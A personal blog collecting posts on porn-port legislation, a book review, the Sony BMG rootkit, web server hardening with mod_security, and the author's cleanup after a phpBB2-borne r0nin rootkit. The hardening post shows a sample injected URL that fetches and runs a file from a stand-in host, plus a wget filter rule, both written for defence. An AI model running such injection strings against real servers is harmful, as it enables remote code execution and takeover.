Rodney Fletcher’s Blog

I was just reading on that ultimate community & blogging site slashdot.org about some guy who wants to legislate a specific TCP port for porn.

His proposal is that all porn (should I say pr0n?) should be available only on a specific protocol so it’s easier to block away from children, etc. Ok, on the surface, this idea has merits. No more having to check site content or publish only certain sites to students or employees – you could just block “port-666″ – coz that’s the port I assume he’d like it dedicated to. That or “port-6969″.

Under the surface, the idea is about as useful as asking spammers to please send all their spam on a specific port, which we could all block. It requires buy in from people who are not going to buy in.

His solution to this: legislation. Seriously, he thinks American politician should be allowed to tell the world how to behave (which American politicians already seem to think anyway). Oddly enough, he thinks they have the power to enforce this, which is an unfortunate way of thinking. He talks about penalties for non-compliance. So, should the US Congress then start penalising Swede’s for not obeying US law, while they’re still at home in Sweden? Should the US invade China because they’re still using port 80 for their porn? Such thinking shows a complete lack of comprehension of the world and the internet in general. Either he doesn’t get the concept of the internet or he doesn’t get that there is a world outside the US’s boarders. Probably a little of both.

In any case, it’s destined to fail, if he heads down the legislation route. The internet is the pinacle of free-enterprise. If it’s a good idea, it will fly by iteslf. If the government has to step in and enforce it (which they can’t anyway) it will fail.

Some more stuff to think about
-=Rodney=-

• Leave a comment... (1)

Book: God’s Debris
Author: Scott Adam

For anyone who likes a bit of something thought provoking, Scott Adams (think Dilbert) has come up with a new book. Well, it’s not that new but it’s new enough. Anyway, you can download it from here.

The concept of the book is to challenge the way you think about creationism, evolution, free thought, etc. An attempt to provide a different view on the ‘big questions’ in life.

In the end, he does provoke thought and make you try to stand up for your beliefs but his methodolgy is a little too thin. I mean, I know what I believe and I didn’t find the book offensive (he warns some people may be offended if they’re really touchy about religion, which I don’t consider myself to be :p) but he runs a simple and repeated dual attack: a) rush a paradox at you, ask you quickly to challenge it and move on and b) use the main character to try to mirror your reactions, and then quickly concede defeat.

This works because he throws something at you (usually a paradox) and asks you to defend yourself against it, then over the next page throws another, equally compelling paradox. You find yourself about to make a good arguement, then you forget and start the next one. The net result is, most people who read it walk away convinced.

If you do stop and think about it though, none of the arguements are final or truly compelling – but they’re not meant to be. It’s just a guy’s chance to make people stop and think about themselves and their world, what they’re doing and how they’re doing it and to that end, he’s done well.

It left me with one outstanding thought, one he’s made in other Dilbert books (the Dilbert Future, specifically) which refers to humans thinking we have leart so much and really are so close to understanding everything, or at least of a lot of things. In the Dilbert Future he points out how every generation in history has thought this, so what makes us think we’re in the exact first generation who got it right? But in God’s Debris, he elaborates on this quite well.

Here’s the concept (btw this is from the book, not my personal thoughts but like I said, it left me thinking). Humans don’t understand anything at all, at least not the way we think we do – not in a special way. You can teach a dog to do tricks or behave by cause and effect (get a treat or a smack) and we consider we have a better understanding than this but, from a certain perspective, we don’t. Take electricity. We know that if we do something (eg turn light switch on) then the light will probably come on. So far, no better than the dog.

Ok I know, you’re thinking “yes but I understand it better than that”. Do you? Ok, let’s see, shall we? You turn on the light switch and provide a current to a conductive material, which in turn, causes an electromotive force (electron flow) to occur. This moves through the highly resistive material in the globe which generates a lot of heat, light being a by product of this. Ta-da! Turned on the light! But what do we understand here? More than the dog? Well, this is just cause and effect, based purely on empirical data (i.e. statistics or more realisically, personal experience). Ok, it’s a lot more complex than fetch-stick-get-pat but it’s no better. Do you know why the electrons flow when current is induced?

Right now you’re probably thinking, “no, but at least someone does, so as a species, we’re doing better.” Wrong. No one knows. Why does gravity attrack something? No one knows. Magnets? Nope, no one there either. Yes, we understand what happens but we don’t know why. Ever. We’ve got nothing. Doctors, psychologists, physists, chemists, the lot: nothing. All we have is an ever growing list of questions with no answers or unproven theories. All of which have failed to stand the test of time. Try it. Think of something humans have figured out and see if we really understand it – or if we just have a good idea of what happens to y when you do x.

So if you want to be a little challenged (for free!) go to the link above and have a read. If you like Dilbert, it’s probably up your alley but be forwarned: it’s not a humour book and there’s no cartoons. It is however quite short and good for a lazy Sunday afternoon.

Result: Might upset some people, probably not too many who don’t live in the South of the US and well, they’re always miffed about something anyway. Won’t change the world or really shift anyone’s thinking long term but it will be good to discuss amongst your friends.

6.5/10

Till the next time I get bored!
Rodney.

• Leave a comment... (2)

Been reading about Sony lately?

Well, if you’re into technology and computers, you probably have but otherwise, you’re probably wondering what I’m talking about.

Did they post a record profit?

Did they invent a new technology that’s going to revolutionise the way we watch movies?

Did they intentionally propogate a rootkit with a back door they can open anytime onto 10’s of thousands of paying customers computers and illegally hide software on said customers computers to ensure they can always get back in?

Here’s a clue: in multiple choice exams, the longest answer is usually the correct one. This is no exception. Although in this case, a) will probably still come true anyway. Full story can be read here.

So yeah, Sony BMG decided that they’ve have enough of people stealing their music, it’s time to do something about it. Actually, it’s not the first time. Sony has been accused in the past of releasing worms on the P2P network KaZaa in the past and there’s fairly solid evidence that that’s a fact, not a rumour. (Google: “sony worm virus kazaa” – there have been many).

This time, however, Sony changed their attack vector. Instead of going after people who are stealing their property via piracy, why not selectively and exclusively infect only those people who definately have a legitimate Sony product? Brilliant! What Sony BMG chose to do was install an audio player on their new CDs which forces you to use their software to listen to the music. Now by itself, that’s not too bad. Here’s where it goes off the rails.

Sony first configured the autorun to install the software without your permission. It’s hidden and also fakes an uninstall, if you do try to remove it when you find it. Additionally, it opens a back door to Sony and informs them of every other piece of music on your computer. Sony emphatically denied this until it was proven to them without a doubt. The final piece of this wonderful software is that it’s not secure, so now non-Sony viruses are taking advantage of it. If you read the link above – you’ll see 3 American states are now sueing Sony BMG over this. Of course, if you or I did this, we’d be off to prison for 10 years of rectal probing, but hey, Sony are rich and it’s America!

Of course, the whole thing takes on a slightly more humour twist, once you look under the surface. Ok – Sony BMG want piracy to stop and are fed up with people stealing their intellectual property. Many would say fair enough. Some might even say their vigilante and illegal action is justified (not many but few). Not a hell of a lot of people, however, would say it’s ok for Sony BMG to STEAL SOMEONE ELSES CODE to do it with. Yes, that’s right, Sony stole the code for their player from the Open Source project, LAME. Then violated the GNU GPL by trying to hide it.

The laughs keep on coming, however, when someone discovered that by putting a piece of sticky tape over the CD, the whole anti-copying software fails to load. Another reader points out: simply disabling autorun or holding down shift when you insert the CD also defeats the software.

So once again, the multi-billion dollar company’s multi-million dollar anti-piracy measures have been defeated by a few seconds worth of people’s time. Sony have had failed attempt after failed attempt at preventing people from ripping their CD’s now, many of which have been circumvented using other equipment manufactured by Sony. Someone should really fire their whole techincal advisory department. Here’s a clue, geniuses: if you can hear something, you can record it. If you can record it, you can copy it. Even if the CD outright won’t play on computers or will only play with your software, I can always plug the audio line out straight into the audio line in and just hit “record”. Sampling at 2×44,000Hz is no problem for modern sound cards, so there will be no loss of quality. How, exactly, do you stop that, Sony?

And that’s Sony’s new angle: finally they’ve realised that it’s impossible to stop people copying music that they can play, so they’ve adopted a new policy – music people won’t play. It’s called ‘Project Brittany Spears‘.

Till next time.
Rodney

• Leave a comment... (0)

Ok, so here’s the first in my “Getting better security” going posts. Let’s start off with fixing the Web Server.

Ok, to begin with, what’s the attack vector here? When we’re looking to block an attack, we really want to know where it’s coming from. Usually, you’d look in your logs and see what’s coming in and what’s the flavour of the month but also try to think about what is possible. So, that’s it: we’re looking at the logs and this means we’re thinking about what’s coming in via URL requests.

So, let’s start by thinking about how people attack you via the URL. When I want to pass something to a Web server I can use two methods (ok, I’m being generalistic but stick with me). GET and POST. Of these, most attacks are coming in from a GET.

So what’s the difference? If I go to www.someplace.com/login.php, I’m trying to GET. If when I fill my details in and hit enter, the URL at the above changes to something like www.someplace.com/logincheck.php?user=ok – that’s a GET. If the URl gives away no clues, we’re working with POST. POST sends the variables in something like the background as more traditional variables, whereas GET sends them out in the open, for the webserver to, well, “get”, from the URL. Obviously, GET is the easy target here. We can clearly see what’s going on and start to manipulate it. Strangely enough, it’s also far more common.

Now, PHP and ASP code, among others, handle both GET and POST and they’ve both recieved a lot of negative publicity because of the ease of which a lot of code written in either language is exploited. Let’s be clear that this is not really the languages’ fault – it’s the coders’ – but I digress. The point is we are thinking about a way to protect ourselves from people crafting URLs for negative reasons. Let’s have a look at some examples of what people can do.

In this example, someone tries to trick the web browser into allowing them to upload code:
http://www.someplace.com/phpcode.php?php_root_dir=/tmp;%20wget% –
20http://www.nastyplace.com/nastyfile;./tmp/nastyfile

Ok – so it’s over simplified but you get the idea. They try to change the directory, try to wget a file (for the record %20 = a space and the “;” indicates the same as pressing enter at a command prompt) and then they try to run that file. We can see a whole bunch of things we don’t want to allow right there and in normal circumstances, you’d rely on user permissions to prevent this from working. Your OS would say to the web server “sorry, you aren’t allowed to write to /tmp, get lost”. Of course, this also assumes that the php code is dumb enough to allow such a thing but the remarkable thing is a lot of the stuff people download out there is exactly dumb enough to allow this. phpBB & phpNuke, for example, which are in used across hundreds of thousands of sites.

What happens, though, if your web server can write to /tmp? In short? You’re in deep shit. Someone can upload code and execute it, which may be all they need to elevate permissions and get administrator / root control of your box. Ok – seems a little far fetched? Guess what – by default, if you’re running Windows 200x Server, IIS can indeed write to the most of the hard disk because the “everyone” group has permission. Also, on Linux (before you get too smug), Apache can write to /tmp or /var/tmp. So if it get’s this far, you’re now relying on your Kernel preventing elevation, or to put it another way, you’re now relying purely on patches and the hope that they’re up to date and cover the unknown. Good luck.

The obvious conclusion is this: don’t let people put bad code on your server. The solution to that, however, means you must comb through and test every single line of code on every web page and the fact is, you can’t. Even if you did, the client would probably just change the code later, so we need something else here. Something to stop the web server from even being subjected to these attacks.

Enter, pre-filtering requests. That is, we inspect the URL as a string, prior to processing it, and if it has something we don’t like, we don’t process it. There are two ways to do this: URLScan (IIS) or mod_security (Apache). In this article I won’t go into much detail on URLScan because it’s an “on or off” tool. You install it and it just blocks things Microsoft deem to be bad, in effect, it just blocks really long strings that are buffer overflow attemps. It’s good but it’s not great. It’s built into IIS6 but a downloadable add on for IIS5.

mod_security, on the other hand, is customisable. You have complete control over what it does (which is great of course only if you know how to use it ). So let’s view our attempt from above, where someone tries to use a few simple tools to do things on your server. Firstly and most obviously, wget. Why they hell would a legitimate website ever ‘wget’ anything? Chances are, it wouldn’t. Ok, let’s see how we block it.

Initially, I am going to say, you’ve already installed it. This is a Blog, not a howto, but if you go to http://www.modsecurity.org/index.php you’ll find all you need. Let me just say, it’s very easy. In anycase, once installed, I need two words to filter out wget – ‘SecFilter wget’. That’s it, the above attack will now fail. A few more simple lines gives you all the power of URScan (available at the above URL) and then you can customise it to your hearts content.

Before I go, you may recall (it’s been a long post) that there was also the problem of POST based attackes. They’re rarer but not impossible. The reason for this is the attack has to come from within another page, so someone has to go to the trouble of targetting you, not just a worm (although a worm could theoretically do this easily). So, how do we keep ourselves safe from attacks where we don’t have the luxury of seeing the URL before the webserver does? Fortunately, mod_security also has the ability to inspect POST commands as well as GET, so really, it’s no extra work!

Ok, that’s the start of a look at hacking a web server and preventing it. It goes without saying that you must keep your system patched and firewalled but this offers a little something extra. Hope you enjoyed it.

l8r,
Rodney.

• Leave a comment... (0)

So anyway, after my last posting, which was about a (thankfully very minor and not entirely successful) hacking attempt, I’ve been getting back into security. Have let it slip too much lately. When I set the server up, security was everything and I made it strong and solid. The problem is, time moved on and I didn’t. I got lax because things were going well. I had my ‘2003 secure’ server and let’s be honest here, I just forgot about it all. Life moved on.

Well… It’s wake up time.

For those of you involved in the world of sticking stuff on the web (let’s call it hosting), you are probably familiar with the nightmare that is your weblogs. If you’re not one of those people let me fill you in. Someone (or something, a bot usually) tries to ‘hack’ you about 100 times a minute. It’s just non-stop, full on, all day everyday. The more stuff you host, the worse it is.

So anyway, with that in mind, I decided to set out on securing something better than it is now, at least once a week. While I do this, I’m going to record how and store it on this Blog, in the hope that at least one other person gets some benefit from it because I have had so much help from others, I really need to offer some back.

I won’t go into any more detail in this BLOG, it’ll just be an announcement. Then I’ll keep each bit of info seperate, so people don’t need to read this crap

Cya

• Leave a comment... (0)

Ok, so life in the hosting business can truly suck sometimes.

On a daily basis, we all have to fend off about a billion passive attempts from worms and scripts, all trying to exploit our computers. People sitting at home on their Windows XP Home Ed computers sure cop a lot of it and the IIS servers of the world take the brunt but even those of us who chose a ’safer’ option in the open source world have an endless and, eventually, losing, battle here.

When you’re a web host, it’s a million times harder. I have to not only open up services that I want or need but I have to open up ports and protocols at the whims of people who suffer badly from the “I want this but have no idea what I’m asking for” syndrome. It’s so often that someone will want some stupid 3rd party app enabled that needs to run as root and opens every port under the sun and hasn’t been patched since 1992… then you find out they never even used it.

When you try to explain to them that perhaps, running PHP out of safe mode and enabling global variables might be a bad thing they just complain “but some crappy thing I downloaded from spammers-r-us needs it!”. I know, you’re going to say “don’t let them”… well, it’s never that easy when they’re they paying customer and I’m the guy who has to play rhoshambo with the miriad of worms out there. For once, I just wish people would get this… But they don’t get it and they don’t care. And if it costs me several days to clean up the mess… they still don’t care.

Anyhow, there’s a point to this… yes… I got a r00kit installed. Thanks fuckers. r0nin rootkit, to be precise, which came on in through a vulnerability in phpBB2, installed on a site by a client who, of course, wasn’t even using it. They just installed it and then decided, nah don’t need it. Did they patch it? Keep it up to date? No, they weren’t using it. Was it available to the world (worms too?) – hell yes!

Now, coz I *really* want to help the next poor bastard this happens to, I’m going to go through a little detail about how I found it, and what I can do about it.

I needed to change a setting on Apache, so i went into the conf file and made my change. Then I went to restart the service. Ok (yes, it’s RedHat): service httpd restart…..stoppping (OK)… restarting (FAILED). Something is already on port 443.

Crap. That’s not good. So i figured that maybe a PID had locked or the like. Let’s have a quick look:
root@halima]# netstat -lpn |grep ‘0.0.0.0:443′
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 20893/r0nin

-Fuck-
Nothing good has a mixture of alphanumerics when it comes to executables. And I sure as hell didn’t put it there. Let’s kill it with a kill 20893. Does nothing, it restarts in a new PID. Over and over again. Damn it…

Next up, updatedb + locate r0ninas well as find / -name r0nin turn nothing up, so they’re hiding it a little better than not at all.

Trolling the logs turns nothing up so it’s time to try something new… what’s hidding in /tmp? Nothing… what about /var/tmp? newbash. Owned by user Apache and world executable. Bingo. Take a copy to look at later, delete it and kill the process… it stops and Apache resumes conrol of potr 443.

Ok, the immediate problem’s passed but we’re not out of the woods yet. Hell, I’m not even sure what wood I’m in. But i have something nice – a file date/time stamp that’s actually believable (a week back). So let’s troll the logs for things that happened around then…

You’d never believe it but I actually found something at the same damn time, in a weblog for a client’s site, running, of course, phpBB2. A file called ‘viewtopic.php‘ was hit at the same time, from an IP at internode (Adelaide/Australia based ISP).

Google viewtopic.php and see what comes up.. Guess what? r0nin rootkit of course! Turns out this is a known exploit that’s able to exploit this file in phpBB and has been around since 2004. A frikkin year! But the person who uploaded phpBB uploaded an old version they had sitting on their hard disk and never even thought that maybe, just maybe, they should check to see if there’s a newer version around?!

This is what I mean about hosting. I take responsibility for my machine and I know some of this rests with me but imagine if all the people out there who didn’t know / care about security had the ability to write to your computer – and you just have to let them. At the end of the day, there’s only so much you can do to protect yourself and only so much you can know about.

The good news is that because the server is configured securly, the process installed wasn’t able to achieve any of it’s payload and the bash script they ran wasn’t able to be exploited. Ordinarily, r0nin tries to deface websites, etc but it couldn’t do that in this case.

So now I’m off to do what has to be done with a hacked server. Yes, it’s all working and the attack vector has been silenced but it’s still time to burn it to the ground and start again. You just have to.

So until next time, cya later.
-=Rodney=-

—————————–
Some related reading:
Superb Blog by someone else in my shoes.

An excellent location for information

This blog is ok (for now… maybe )/

• Leave a comment... (2)